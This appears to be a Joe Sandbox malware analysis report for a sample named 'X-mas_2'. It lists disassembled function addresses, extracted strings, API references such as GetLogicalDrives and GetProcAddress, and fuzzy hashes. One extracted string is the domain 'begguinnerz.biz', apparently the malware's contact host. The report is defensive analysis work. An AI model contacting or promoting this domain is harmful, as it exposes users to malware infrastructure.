Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: "uB$)yB$QyB
API String ID: 0-1484077961
Opcode ID: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
Instruction ID: bebb4fd51b4539f016b18d377b659452e01560476b88e099c37467506dc643be
Opcode Fuzzy Hash: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
Instruction Fuzzy Hash: 75D12676A0C351CFD714CF28D85131ABBE2AF86314F0989ADE4959B3A1D738ED41CB86

Function 020FC718 Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

{u, xrefs: 020FC8B4
:G!A, xrefs: 020FC89F
Vw1q, xrefs: 020FC8BB

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: :G!A$Vw1q${u
API String ID: 0-645793561
Opcode ID: d9859eb31a31cdbf60214cc7157b8ca7ccb7a5bb786fb0cd9a1b3df864108782
Instruction ID: caace0cc8bfdf932a16b7e5505a3613829ac8652441e531732941da4e65af1f6
Opcode Fuzzy Hash: d9859eb31a31cdbf60214cc7157b8ca7ccb7a5bb786fb0cd9a1b3df864108782
Instruction Fuzzy Hash: 226133B19003558FEB15CF25C8815EABBB2FF55310B188698E9995F706C335E982CF91

Function 00414777 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

>MA, xrefs: 0041495F
]k, xrefs: 004147DA
rIA, xrefs: 00414965

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: >MA$]k$rIA
API String ID: 0-1646247225
Opcode ID: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
Instruction ID: 7dcd1ab1f66cc66079ed29567c30894e9083a3f88b64816671fdba32d81f215f
Opcode Fuzzy Hash: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
Instruction Fuzzy Hash: 604158B6A4836286D718CF24E8513A7B3E2EFE5314F19443ED88597781F7788C41C39A

Function 020E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 020E0966
GetProcAddress., xrefs: 020E09DC, 020E09DF, 020E09E4
., xrefs: 020E095F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9bf1a15524f93da5d415a352a70f6fdaaa80b869e271974596a4df611b68795a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 133149B6900709DFDB11CF99C880AAEBBF6FF58324F14404AD442B7210D7B1EA85CBA4

Function 020F7ADB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020F7D75

Strings

@AF, xrefs: 020F7B1F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: @AF
API String ID: 237503144-756553303
Opcode ID: 25e27d70cd3e74f13fd016ba4e15acf373485966cb214dbd5c4eaa9ba225bbe3
Instruction ID: 77bb39a9932d52f0c696c5e3c1c57191251504996e0184dcae976674c39d2a69
Opcode Fuzzy Hash: 25e27d70cd3e74f13fd016ba4e15acf373485966cb214dbd5c4eaa9ba225bbe3
Instruction Fuzzy Hash: 768123716483528BD360DF28C8907ABF7F2FF94754F18892DE5C44BAA1E7389581D782

Function 021036AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 021037FD

Strings

7x~, xrefs: 02103728

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: 7x~
API String ID: 999431828-3352779061
Opcode ID: 5c7ebdc5a257af63bd1685ed3bbf47601eb011aba586d74b0531b9f1d5c5cc27
Instruction ID: 32bbbcc02077f4f49c3812296867df80e5bfc10fd745e0123020529d5b022ccc
Opcode Fuzzy Hash: 5c7ebdc5a257af63bd1685ed3bbf47601eb011aba586d74b0531b9f1d5c5cc27
Instruction Fuzzy Hash: B4310BF0A202018FCB58CF55C9A0A7A7BB2FF4231871A81DCC5429F762E375D849CB94

Function 02103A37 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 02103B0F

Strings

52, xrefs: 02103ABD

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 52
API String ID: 237503144-725582281
Opcode ID: a84148c0a63f9ce41cbb27a324e4420d5e4010ee83edb59f860a2a1c2311e0e1
Instruction ID: aa06bed3b63274b49e27e89c19d18900ac89608c74e36fe424e39f39e3a4a1e1
Opcode Fuzzy Hash: a84148c0a63f9ce41cbb27a324e4420d5e4010ee83edb59f860a2a1c2311e0e1
Instruction Fuzzy Hash: 4631C37125C3518FC704CF69988535BBBE1FBC5308F445A2CF5D59B281C7B5940A8B4A

Function 00404BC0 Relevance: 3.3, Strings: 2, Instructions: 822COMMON

Download Yara Rule

Strings

8, xrefs: 0040550E
0, xrefs: 00405516

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
Instruction ID: a24fc17715fdec5a2fa229d4773a009ac4947e42e4396509e056516fea690fd9
Opcode Fuzzy Hash: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
Instruction Fuzzy Hash: 8E7226B16083419FD714CF18C880B6BBBE1EF98314F44892EF9999B391D379D948CB96

Function 020E4E27 Relevance: 3.3, Strings: 2, Instructions: 822COMMON

Download Yara Rule

Strings

0, xrefs: 020E577D
8, xrefs: 020E5775

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
Instruction ID: 906a59aaf57fa0d68b9da91fb20be6d54c82bde67d99e4409833307ee3bb3fbb
Opcode Fuzzy Hash: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
Instruction Fuzzy Hash: DB7259716083409FDB55CF18C890BAFBBE1AF88318F44891DF99A87391D375D988DB92

Function 00424974 Relevance: 3.2, Strings: 2, Instructions: 715COMMON

Download Yara Rule

Strings

PB, xrefs: 004250C6
`ibc, xrefs: 004249B5, 004249CC, 00424A38, 00424A48

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: `ibc$PB
API String ID: 0-1987769102
Opcode ID: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
Instruction ID: d7af6ebc4ec7fa9aafc34c7092b5181dfb32356bb0cb9250f61f6585be71885b
Opcode Fuzzy Hash: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
Instruction Fuzzy Hash: 862237366183258BC324DF39DC412ABB7E2EFD5314F59893EE891D7390E77899018B89

Function 0043C510 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

f, xrefs: 0043C7A5
xHLG, xrefs: 0043C512

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: f$xHLG
API String ID: 2994545307-1062749201
Opcode ID: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
Instruction ID: d2651cdac37472708b43d0abb75bf2b64163b131a76c60ca99435b560db9f8b9
Opcode Fuzzy Hash: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
Instruction Fuzzy Hash: 092215756483418FD314CF24C8C172BB7E2ABC9314F19A93EE585A7392D679DC418B8A

Function 0211C777 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

f, xrefs: 0211CA0C
xHLG, xrefs: 0211C779

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: f$xHLG
API String ID: 0-1062749201
Opcode ID: 4425e64694c509710bf7a308cda77f149d7a8c32f3ba0b22036b8307e2f36974
Instruction ID: 6b5fd8f10ac57e2623b2fedd9f05ac425517a9265d75fe7002b68954392196a8
Opcode Fuzzy Hash: 4425e64694c509710bf7a308cda77f149d7a8c32f3ba0b22036b8307e2f36974
Instruction Fuzzy Hash: 7322F1716C83419FD724CF24C880B6BBBE2ABC5318F1D8A3EE99597291D771D841CB86

Function 00426340 Relevance: 3.2, Strings: 2, Instructions: 688COMMON

Download Yara Rule

Strings

H/'&, xrefs: 00426EC5, 00426EE6, 00426EF1
ur, xrefs: 00426B69

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: H/'&$ur
API String ID: 0-969745386
Opcode ID: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
Instruction ID: 443a563da7a5e4d6bc490b1340c0ec2082c34ead57a9a2c43d9228df9cd59d8b
Opcode Fuzzy Hash: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
Instruction Fuzzy Hash: 99322776B083608BD728CF29D85176BB7E2EBC5314F09857DE8899B391DB749C01C78A

Function 00414DC0 Relevance: 3.0, Strings: 2, Instructions: 530COMMON

Download Yara Rule

Strings

30, xrefs: 004153DD
b, xrefs: 004153B1

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 30$b
API String ID: 0-3051719697
Opcode ID: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
Instruction ID: 9d6171b0f8d729934fe615063e41a7396b25218e269f5ca015a4c9f4117884d8
Opcode Fuzzy Hash: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
Instruction Fuzzy Hash: D4F134B5949340CBD724DF24C851BEBB3B1EFD5354F098A2EE48A4B391E7385841CB8A

Function 0040C6F0 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

begguinnerz.biz, xrefs: 0040CAAE, 0040CE42
~|, xrefs: 0040CD42

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: begguinnerz.biz$~|
API String ID: 0-3887013502
Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction ID: 07f789514de0362c9278d2f25248cc3fff6a0dc72d81a8c8c11c8a6f1e2f7610
Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction Fuzzy Hash: 9902DEB114D3C18AD735CF25D4907EFBBE0EB96304F188A6DC4D96B252C3794906CB9A

Function 020EC957 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

begguinnerz.biz, xrefs: 020ECD15, 020ED0A9
~|, xrefs: 020ECFA9

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: begguinnerz.biz$~|
API String ID: 0-3887013502
Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction ID: 9afff1061350a957a6976b10f84762616a81eff65c66eb6f4e0badf27834240d
Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction Fuzzy Hash: F802BAB01493C18EE736CF24D4907EFBBE0EB96308F18896DC4DA9B252C37A4546DB56

Function 0042847D Relevance: 2.9, Strings: 2, Instructions: 420COMMON

Download Yara Rule

Strings

i=+9, xrefs: 0042849F
!-%., xrefs: 00428498

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: !-%.$i=+9
API String ID: 0-3329930587
Opcode ID: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
Instruction ID: 5b9224ec03390a89ae17c2f1361fc79f648e0f3307ec9c5c46c31c27b4184649
Opcode Fuzzy Hash: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
Instruction Fuzzy Hash: B0D1D2B4A05214CFCF14CFA8D8D1AAEBBB1FF4A304F4445ADE415AB392EB389941CB55

Function 00429040 Relevance: 2.9, Strings: 2, Instructions: 376COMMON

Download Yara Rule

Strings

#&J:, xrefs: 0042921A
1?,s, xrefs: 00429228

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: #&J:$1?,s
API String ID: 0-2217357408
Opcode ID: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
Instruction ID: dd87f522568f88e555f085d5caeae9b1fcb5bc55a8534498744cbd14fa8b2ca1
Opcode Fuzzy Hash: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
Instruction Fuzzy Hash: 9CD15975F08154CFDB08CF69E8D1AAE7BB2AF4A304F5845ADE4519B392D7398D01CB28

Function 021206E7 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

, xrefs: 0212079B, 021207D7, 0212086F
=:;8, xrefs: 0212076C

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8$
API String ID: 0-3594289699
Opcode ID: 54622b6d0cfbd8782a9b905a12d251efd83151fcb670ab7e5f751ac33e713159
Instruction ID: 1a772cd83eba83af9e33d77a3410ad2516e71334e0571880d4383cdacadbd152
Opcode Fuzzy Hash: 54622b6d0cfbd8782a9b905a12d251efd83151fcb670ab7e5f751ac33e713159
Instruction Fuzzy Hash: 7EA13976B843608BDB148F64D88066BB7E2EBE9314F19863CE9C697351D731DC15C782

Function 00404280 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00404671
), xrefs: 004042FB

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 38ae6fca175464ceba27fb6679b714bd8b92d339aec8cc4acbfdf75a17812591
Instruction ID: 1c4037f214bd03ac7378b9cacc3dd6070e77dcd69ce248976fcc19ea77d077a6
Opcode Fuzzy Hash: 38ae6fca175464ceba27fb6679b714bd8b92d339aec8cc4acbfdf75a17812591
Instruction Fuzzy Hash: 9CD1A0B19083449FD720CF14D84575BBBE4ABD4308F14492EFA99AB3C2D779E908CB96

Function 02106267 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

Zysf, xrefs: 02106527
{ts|, xrefs: 0210650D

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: Zysf${ts|
API String ID: 0-929106683
Opcode ID: f4ccfada1b2572893ed18b9fcea671eb4e4b229891e45a3910053c223ccae487
Instruction ID: 509ff9cf449185eea03cebf5b439589a137508a95d57df7d140a13799077cd98
Opcode Fuzzy Hash: f4ccfada1b2572893ed18b9fcea671eb4e4b229891e45a3910053c223ccae487
Instruction Fuzzy Hash: FE8149B1A883815BD724DE25CCC1B3B72AAEFC5314F19843CE5868B2D4E7B99814C792

Function 00416C90 Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

0v9t, xrefs: 00416DB4
qN, xrefs: 00416E93

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 0v9t$qN
API String ID: 0-941405136
Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction ID: 220aa0fee5a4e2dc26cf1b999887b7bccb6aee529e7354faf9f9a8d1f9f2e198
Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction Fuzzy Hash: 495147766053114BC7248A24C8917EF7693DBC1328F1B4A2DD8E59B3D2DB3DD84693CA

Function 020F6EF7 Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

qN, xrefs: 020F70FA
0v9t, xrefs: 020F701B

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: 0v9t$qN
API String ID: 0-941405136
Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction ID: 70b98548bb4540abda2ac7dff879f57e7c4412f59d95621af82104dc42197072
Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction Fuzzy Hash: 2B51CF726443414FC72589248C517EF76D3DFC1328F1A462CD9F59BBE5CB3A840AA782

Function 0043E262 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

@, xrefs: 0043E392
MVWT, xrefs: 0043E28A

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: @$MVWT
API String ID: 0-308850327
Opcode ID: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
Instruction ID: 65c5c0bd10fcc527816f4646fa5217bc89ccf3aa808f0d29d6591c7bb2e007d1
Opcode Fuzzy Hash: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
Instruction Fuzzy Hash: D54113765193418BE704CF26C45036BB7E2EFDA305F59682ED4C2AB394DB7C8906CB4A

Function 0043E850 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

siOk, xrefs: 0043E9D5
siOk, xrefs: 0043E8FD

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: siOk$siOk
API String ID: 0-2545891108
Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction ID: 3c122c9db7ae0a256ae9501e17b53326d689da9f2a67ac00692780b2415a66a0
Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction Fuzzy Hash: AB21052951DAA04BCB36CB3D44D463EBBE65F97110B08897DDCE2C73CAC5249800D765

Function 0211EAB7 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

siOk, xrefs: 0211EB64
siOk, xrefs: 0211EC3C

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: siOk$siOk
API String ID: 0-2545891108
Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction ID: e1e656f4e392e0dcce57eea18f91154ce7efeb265d14db4997d6cbfc901463f8
Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction Fuzzy Hash: 9421EF2911CAA04BCB368B7C48D463ABAE65F9710070889BDDCE2CB3DAD6349800CB65

Function 0042C1A3 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

x, xrefs: 0042C1AB
/:8*, xrefs: 0042C1C4

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: /:8*$x
API String ID: 0-64667063
Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
Instruction ID: 1aa5775c3a72f552b4e6bc18da63457a51b737a705f76bfcd9083c664813a2f3
Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
Instruction Fuzzy Hash: E9014526A0D2B18AD301CA289980217FFD19B97700F184A99D4E6A7290C928DE05879A

Function 020F72AB Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

S,3!, xrefs: 020F72FC
A, xrefs: 020F72BA

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: A$S,3!
API String ID: 0-292199176
Opcode ID: 39a18ddc663f4b67270280978270a49b978e2ad5c693f213836dc290c3bf4e10
Instruction ID: b94ebe40e48f7a5a57e0a963fccaf2a0fa6a35e2eb97cbc0ff7814303f3e96cd
Opcode Fuzzy Hash: 39a18ddc663f4b67270280978270a49b978e2ad5c693f213836dc290c3bf4e10
Instruction Fuzzy Hash: 6301FD3454C3808EE3A18F258450BEBFBE1DBC3305F1888ADD0C893292C67AC806DB63

Function 020F7648 Relevance: 1.8, APIs: 1, Instructions: 322COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020F796F

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 4e9f676f73d3ee42016d05ae17f61838f1769c97ff718641a6533bfe57131db6
Instruction ID: 1982742f35cff617100e68eb3d7380d5c246f67e7eca0fc17a7f87872387f92f
Opcode Fuzzy Hash: 4e9f676f73d3ee42016d05ae17f61838f1769c97ff718641a6533bfe57131db6
Instruction Fuzzy Hash: A5915671A483128BD368CF28C4906BBF7F2EFD5354F19892CE9C94BA61E7388546D742

Function 00423A60 Relevance: 1.7, APIs: 1, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
Instruction ID: 0c1059f1939fd580b755bdfd37faf5cc9b9fc08dac3a05aab46d246ee4cf4ccd
Opcode Fuzzy Hash: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
Instruction Fuzzy Hash: DC816976A083109FE320DF54DC817EBB7E5EBC4308F04453EFA8897291D77899068B96

Function 00423BE0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
